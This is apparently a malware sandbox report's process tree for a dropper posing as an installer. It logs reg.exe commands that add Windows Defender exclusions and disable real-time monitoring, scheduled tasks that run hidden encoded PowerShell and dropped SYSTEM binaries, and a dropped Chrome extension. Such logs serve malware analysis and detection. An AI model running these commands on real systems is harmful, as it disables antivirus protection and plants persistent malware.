cmd.exe reg.exe PID 2492 wrote to memory of 2784 2492 cmd.exe reg.exe PID 2492 wrote to memory of 2784 2492 cmd.exe reg.exe PID 2492 wrote to memory of 2784 2492 cmd.exe reg.exe PID 2492 wrote to memory of 2784 2492 cmd.exe reg.exe PID 2492 wrote to memory of 2784 2492 cmd.exe reg.exe PID 2708 wrote to memory of 2908 2708 cmd.exe reg.exe PID 2708 wrote to memory of 2908 2708 cmd.exe reg.exe PID 2708 wrote to memory of 2908 2708 cmd.exe reg.exe PID 2708 wrote to memory of 2908 2708 cmd.exe reg.exe PID 2708 wrote to memory of 2908 2708 cmd.exe reg.exe PID 2708 wrote to memory of 2908 2708 cmd.exe reg.exe PID 2708 wrote to memory of 2908 2708 cmd.exe reg.exe PID 2492 wrote to memory of 2176 2492 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2412 -
C:\Users\Admin\AppData\Local\Temp\7zS930C.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Users\Admin\AppData\Local\Temp\7zS9878.tmp\Install.exe.\Install.exe /GnXjwdidG "525403" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2708 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:2644
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:2908
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2580 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2492 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:2784
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:2176
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "grhLnNDuO" /SC once /ST 07:36:18 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:2480 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "grhLnNDuO"4⤵PID:2540
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "grhLnNDuO"4⤵PID:1792
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bQrKcOXclPyMmQgfTY" /SC once /ST 17:29:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF\xtiGjqqlqnODuBu\ycRIbyo.exe\" BX /Nrsite_idNdO 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2364
-
C:\Windows\system32\taskeng.exetaskeng.exe {38191FB5-5A1C-487B-9215-48BBFFF4006E} S-1-5-21-2085049433-1067986815-1244098655-1000:AHLBRYJO\Admin:Interactive:[1]1⤵PID:2892
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2904 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2532
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1256 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1268
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2868 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2416
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1232 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2976
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2796
-
C:\Windows\system32\taskeng.exetaskeng.exe {D840B3E7-CA5D-4B92-B102-E191A9B4E4A0} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:2280
-
C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF\xtiGjqqlqnODuBu\ycRIbyo.exeC:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF\xtiGjqqlqnODuBu\ycRIbyo.exe BX /Nrsite_idNdO 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1080 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ghmPelLfX" /SC once /ST 10:53:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:656 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ghmPelLfX"3⤵PID:3056
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ghmPelLfX"3⤵PID:2836
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:892
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1228 -
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1648
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1964 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gDnVtRpAs" /SC once /ST 12:45:33 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1452 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gDnVtRpAs"3⤵PID:1840
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gDnVtRpAs"3⤵PID:2776
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:323⤵PID:2472
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2704 -
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:643⤵PID:2548
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2624 -
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:323⤵PID:2500
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:324⤵PID:2060
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:643⤵PID:2520
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:644⤵PID:2980
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\szdKxxrFMiVXCdXj\XGZzlsuq\rkxIAufwvYuOQYHt.wsf"3⤵PID:3032
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\szdKxxrFMiVXCdXj\XGZzlsuq\rkxIAufwvYuOQYHt.wsf"3⤵
- Modifies data under HKEY_USERS
PID:2476 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PhaWElAePoHhBdUTFeR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2584 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PhaWElAePoHhBdUTFeR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1112 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bJazgiTXFJUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2728 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\icEyDogKU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1448 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bJazgiTXFJUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:340 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\icEyDogKU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1068 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ycMZCyUlVfbU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2132 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ycMZCyUlVfbU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2216 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yczsUHdtPuMxC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2788 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yczsUHdtPuMxC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2036 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\sUklQelueKqzsVVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1136 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\sUklQelueKqzsVVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1860 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1116 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1812 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1756 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1556 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2824 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2948 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PhaWElAePoHhBdUTFeR" /t REG_DWORD /d 0 /reg:324⤵PID:2112
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PhaWElAePoHhBdUTFeR" /t REG_DWORD /d 0 /reg:644⤵PID:436
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bJazgiTXFJUn" /t REG_DWORD /d 0 /reg:324⤵PID:1976
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bJazgiTXFJUn" /t REG_DWORD /d 0 /reg:644⤵PID:964
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\icEyDogKU" /t REG_DWORD /d 0 /reg:324⤵PID:624
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\icEyDogKU" /t REG_DWORD /d 0 /reg:644⤵PID:1868
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ycMZCyUlVfbU2" /t REG_DWORD /d 0 /reg:324⤵PID:2944
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ycMZCyUlVfbU2" /t REG_DWORD /d 0 /reg:644⤵PID:948
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yczsUHdtPuMxC" /t REG_DWORD /d 0 /reg:324⤵PID:1612
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yczsUHdtPuMxC" /t REG_DWORD /d 0 /reg:644⤵PID:1892
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\sUklQelueKqzsVVB" /t REG_DWORD /d 0 /reg:324⤵PID:944
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\sUklQelueKqzsVVB" /t REG_DWORD /d 0 /reg:644⤵PID:2836
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:600
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:2072
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF" /t REG_DWORD /d 0 /reg:324⤵PID:2920
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF" /t REG_DWORD /d 0 /reg:644⤵PID:1840
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:324⤵PID:1764
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:644⤵PID:2924
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gYFegiANi" /SC once /ST 07:43:21 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2380 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gYFegiANi"3⤵PID:2868
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gYFegiANi"3⤵PID:2060
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:1380
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:2520
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:1972
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:2644
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NDmpcgCvNfyvVRxht" /SC once /ST 11:09:01 /RU "SYSTEM" /TR "\"C:\Windows\Temp\szdKxxrFMiVXCdXj\ftQFJCRfveHPGNc\DSWBkkp.exe\" qh /JHsite_idpVY 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:888 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "NDmpcgCvNfyvVRxht"3⤵PID:2540
-
C:\Windows\Temp\szdKxxrFMiVXCdXj\ftQFJCRfveHPGNc\DSWBkkp.exeC:\Windows\Temp\szdKxxrFMiVXCdXj\ftQFJCRfveHPGNc\DSWBkkp.exe qh /JHsite_idpVY 525403 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1712 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bQrKcOXclPyMmQgfTY"3⤵PID:2564
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:1456
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:2032
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:1128
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:2532
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\icEyDogKU\YfJxcM.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "NplADKkCBziqQHN" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2552 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NplADKkCBziqQHN2" /F /xml "C:\Program Files (x86)\icEyDogKU\UsAnVhq.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1504 -
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "NplADKkCBziqQHN"3⤵PID:1420
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "NplADKkCBziqQHN"3⤵PID:2828
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GHwlerDeIQsNdm" /F /xml "C:\Program Files (x86)\ycMZCyUlVfbU2\cPywBfa.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1640 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "XFllyoUkeQVbq2" /F /xml "C:\ProgramData\sUklQelueKqzsVVB\NASOIDK.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1472 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "asZjWRxPJGYSVOeSc2" /F /xml "C:\Program Files (x86)\PhaWElAePoHhBdUTFeR\tkDoewx.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2704 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "hcGrzUAxWeRcgCYFZrx2" /F /xml "C:\Program Files (x86)\yczsUHdtPuMxC\uGNaqiB.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2488 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "yWyixlOEsLxsTwFTt" /SC once /ST 16:50:00 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\szdKxxrFMiVXCdXj\IekAmSJh\tQaSfTW.dll\",#1 /kmsite_idLlz 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2548 -
